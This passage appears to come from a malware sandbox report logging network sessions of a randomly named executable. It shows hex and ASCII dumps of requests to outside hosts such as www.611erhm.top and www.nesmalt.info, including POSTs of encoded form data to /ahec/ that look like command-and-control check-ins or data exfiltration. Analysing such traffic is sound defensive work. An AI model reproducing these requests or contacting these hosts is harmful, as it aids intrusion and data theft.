0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                                                                                                            Dec 8, 2023 14:51:53.648968935 CET1286INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                                                                                                            Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                                                                                                            Dec 8, 2023 14:51:53.649008036 CET1286INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                                                                                                            Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                                                                                                            Dec 8, 2023 14:51:53.649044991 CET1286INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                                                                                                            Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                                                                                                            Dec 8, 2023 14:51:53.649080992 CET279INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                                                                                                            Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            24192.168.2.44976466.29.155.54805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:51:57.012130022 CET469OUTGET /ahec/?XveXHZvx=DTrGbTEHMG6Y4mK16jmiKUG3Xw8oKDF5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRrX+Dyau3GNz4OAA==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.nesmalt.info
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:51:57.301047087 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:57 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 5278
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
                                                                                                                                                            Dec 8, 2023 14:51:57.301076889 CET1286INData Raw: 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33
                                                                                                                                                            Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
                                                                                                                                                            Dec 8, 2023 14:51:57.301099062 CET1286INData Raw: 39 20 32 2e 30 33 20 31 2e 33 32 20 33 2e 37 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31
                                                                                                                                                            Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
                                                                                                                                                            Dec 8, 2023 14:51:57.301146030 CET1286INData Raw: 31 39 20 31 35 2e 32 37 20 33 2e 31 39 20 32 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36
                                                                                                                                                            Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
                                                                                                                                                            Dec 8, 2023 14:51:57.301158905 CET294INData Raw: 75 73 73 69 61 6e 62 6c 75 72 20 63 6c 61 73 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20
                                                                                                                                                            Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            25192.168.2.44976534.117.26.57805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:03.659353971 CET735OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.611erhm.top
                                                                                                                                                            Origin: http://www.611erhm.top
                                                                                                                                                            Referer: http://www.611erhm.top/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 5a 61 38 52 52 54 6d 44 7a 45 41 5a 64 2b 4c 42 72 36 52 57 6c 73 7a 65 42 6e 62 35 71 67 76 38 33 4b 77 36 79 31 46 6b 78 34 56 6c 78 59 39 36 70 64 34 6a 45 72 49 4f 69 6e 54 6c 63 33 62 58 75 53 61 6e 42 48 6a 6a 45 58 2f 4a 35 43 4c 6a 32 73 75 59 4c 71 2f 30 42 75 66 30 57 76 47 35 4b 6c 57 49 63 56 33 6b 76 46 4e 59 32 72 50 39 4d 4f 2b 75 30 4d 46 69 58 68 4d 77 41 69 69 43 4f 77 61 51 6d 57 78 72 39 5a 69 39 35 68 66 35 7a 36 57 78 68 70 6e 44 33 6b 52 6c 31 4e 64 55 68 6b 58 4e 75 69 42 64 53 62 45 44 7a 32 7a 4c 4b 77 3d 3d
                                                                                                                                                            Data Ascii: XveXHZvx=Za8RRTmDzEAZd+LBr6RWlszeBnb5qgv83Kw6y1Fkx4VlxY96pd4jErIOinTlc3bXuSanBHjjEX/J5CLj2suYLq/0Buf0WvG5KlWIcV3kvFNY2rP9MO+u0MFiXhMwAiiCOwaQmWxr9Zi95hf5z6WxhpnD3kRl1NdUhkXNuiBdSbEDz2zLKw==
                                                                                                                                                            Dec 8, 2023 14:52:03.983591080 CET176INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:03 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 157
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
                                                                                                                                                            Dec 8, 2023 14:52:03.986537933 CET157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            26192.168.2.44976634.117.26.57805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:06.312115908 CET755OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.611erhm.top
                                                                                                                                                            Origin: http://www.611erhm.top
                                                                                                                                                            Referer: http://www.611erhm.top/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 5a 61 38 52 52 54 6d 44 7a 45 41 5a 64 65 62 42 73 5a 70 57 6a 4d 7a 66 45 6e 62 35 6b 77 76 34 33 4b 38 36 79 30 42 30 78 4b 42 6c 77 34 4e 36 6f 5a 55 6a 48 72 49 4f 6f 48 53 68 45 58 61 62 75 53 65 5a 42 48 76 6a 45 58 72 4a 35 48 33 6a 32 2f 57 62 4c 36 2f 32 64 75 66 79 59 50 47 35 4b 6c 57 49 63 56 6a 4b 76 45 70 59 31 59 48 39 4f 76 2f 34 35 73 46 68 48 52 4d 77 57 53 69 47 4f 77 62 67 6d 56 30 4f 39 62 61 39 35 67 76 35 69 50 71 32 71 70 6e 46 37 30 51 54 30 4e 73 59 69 58 65 66 69 79 4e 53 63 4c 31 72 79 6a 66 59 4e 42 33 49 59 66 31 53 64 6c 55 7a 37 62 62 30 31 54 4c 6e 68 63 49 3d
                                                                                                                                                            Data Ascii: XveXHZvx=Za8RRTmDzEAZdebBsZpWjMzfEnb5kwv43K86y0B0xKBlw4N6oZUjHrIOoHShEXabuSeZBHvjEXrJ5H3j2/WbL6/2dufyYPG5KlWIcVjKvEpY1YH9Ov/45sFhHRMwWSiGOwbgmV0O9ba95gv5iPq2qpnF70QT0NsYiXefiyNScL1ryjfYNB3IYf1SdlUz7bb01TLnhcI=
                                                                                                                                                            Dec 8, 2023 14:52:06.637350082 CET176INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:06 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 157
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
                                                                                                                                                            Dec 8, 2023 14:52:06.637448072 CET157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            27192.168.2.44976734.117.26.57805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:08.967581987 CET10837OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.611erhm.top
                                                                                                                                                            Origin: http://www.611erhm.top
                                                                                                                                                            Referer: http://www.611erhm.top/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 5a 61 38 52 52 54 6d 44 7a 45 41 5a 64 65 62 42 73 5a 70 57 6a 4d 7a 66 45 6e 62 35 6b 77 76 34 33 4b 38 36 79 30 42 30 78 4b 5a 6c 78 4a 74 36 71 34 55 6a 47 72 49 4f 32 58 53 73 45 58 61 53 75 55 32 6a 42 48 54 7a 45 56 54 4a 34 6c 50 6a 68 2b 57 62 65 4b 2f 32 46 75 66 33 57 76 47 73 4b 68 36 4d 63 56 7a 4b 76 45 70 59 31 66 33 39 59 75 2f 34 71 63 46 69 58 68 4d 38 41 69 69 75 4f 77 53 59 6d 57 5a 37 39 72 36 39 34 41 2f 35 78 5a 2b 32 31 5a 6e 39 34 30 51 62 30 4e 68 61 69 52 36 74 69 79 49 33 63 4d 64 72 78 33 79 45 52 67 50 4d 61 61 35 2b 48 68 67 5a 77 37 4f 4e 6d 6d 50 61 69 6f 77 44 52 6e 2b 43 2f 32 71 7a 4d 50 76 65 63 59 63 68 43 6b 55 46 36 58 52 34 6e 43 6a 6f 35 79 65 78 79 44 69 53 52 6a 72 70 64 4d 48 63 65 4a 69 6e 46 48 77 30 73 51 2b 6e 52 6d 4e 56 56 39 79 4c 39 4c 73 64 4c 66 4d 66 58 68 66 66 74 2b 4c 73 4d 35 68 78 73 73 74 54 5a 53 32 75 56 78 52 52 7a 45 62 2b 31 62 50 36 48 43 52 65 74 7a 47 2f 51 72 73 63 49 38 43 63 79 44 31 34 52 4e 4c 48 2f 34 51 70 38 43 4e 49 4c 5a 4a 55 32 53 50 35 41 6f 46 78 65 66 49 64 51 2f 39 4c 44 34 4f 71 50 78 49 4e 36 30 65 2b 49 2f 4d 79 6a 58 5a 6f 67 34 61 4b 39 30 65 36 69 30 32 44 39 43 34 6c 53 45 59 4d 4d 61 6f 54 2f 2f 61 37 71 6b 36 43 45 6c 41 69 54 4e 49 4c 45 4d 64 4e 76 4c 39 6d 72 50 2b 33 4c 65 67 63 7a 72 61 69 68 46 53 61 78 59 70 7a 72 46 75 6e 37 59 30 74 68 77 36 5a 4e 4f 4e 53 4f 59 56 